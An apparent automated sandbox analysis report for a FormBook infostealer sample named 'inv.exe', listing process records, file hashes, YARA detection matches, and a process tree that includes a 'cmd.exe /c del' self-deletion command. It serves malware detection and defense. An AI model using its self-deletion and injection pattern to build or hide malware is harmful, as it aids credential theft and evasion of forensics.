                                                                                      Commandline:'C:\Users\user\Desktop\inv.exe'
                                                                                      Imagebase:0x970000
                                                                                      File size:494592 bytes
                                                                                      MD5 hash:55F30220E8A613753F178FB901E5E5A6
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.244233732.00000000009B8000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      Analysis Process: conhost.exe PID: 5752 Parent PID: 5764

                                                                                      General

                                                                                      Start time:08:23:28
                                                                                      Start date:26/11/2020
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff774ee0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: inv.exe PID: 4512 Parent PID: 5764

                                                                                      General

                                                                                      Start time:08:23:28
                                                                                      Start date:26/11/2020
                                                                                      Path:C:\Users\user\Desktop\inv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\inv.exe
                                                                                      Imagebase:0x970000
                                                                                      File size:494592 bytes
                                                                                      MD5 hash:55F30220E8A613753F178FB901E5E5A6
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.283524182.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.283891864.00000000013E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.283912769.0000000001410000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      Analysis Process: explorer.exe PID: 3292 Parent PID: 4512

                                                                                      General

                                                                                      Start time:08:23:33
                                                                                      Start date:26/11/2020
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:
                                                                                      Imagebase:0x7ff662bf0000
                                                                                      File size:3933184 bytes
                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: systray.exe PID: 6336 Parent PID: 3292

                                                                                      General

                                                                                      Start time:08:23:46
                                                                                      Start date:26/11/2020
                                                                                      Path:C:\Windows\SysWOW64\systray.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\systray.exe
                                                                                      Imagebase:0xf00000
                                                                                      File size:9728 bytes
                                                                                      MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1315254227.0000000000EA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1314348434.0000000000730000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1315337696.0000000000ED0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:moderate

                                                                                      Analysis Process: cmd.exe PID: 6716 Parent PID: 6336

                                                                                      General

                                                                                      Start time:08:23:51
                                                                                      Start date:26/11/2020
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:/c del 'C:\Users\user\Desktop\inv.exe'
                                                                                      Imagebase:0x870000
                                                                                      File size:232960 bytes
                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: conhost.exe PID: 6792 Parent PID: 6716

                                                                                      General

                                                                                      Start time:08:23:51
                                                                                      Start date:26/11/2020
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff774ee0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >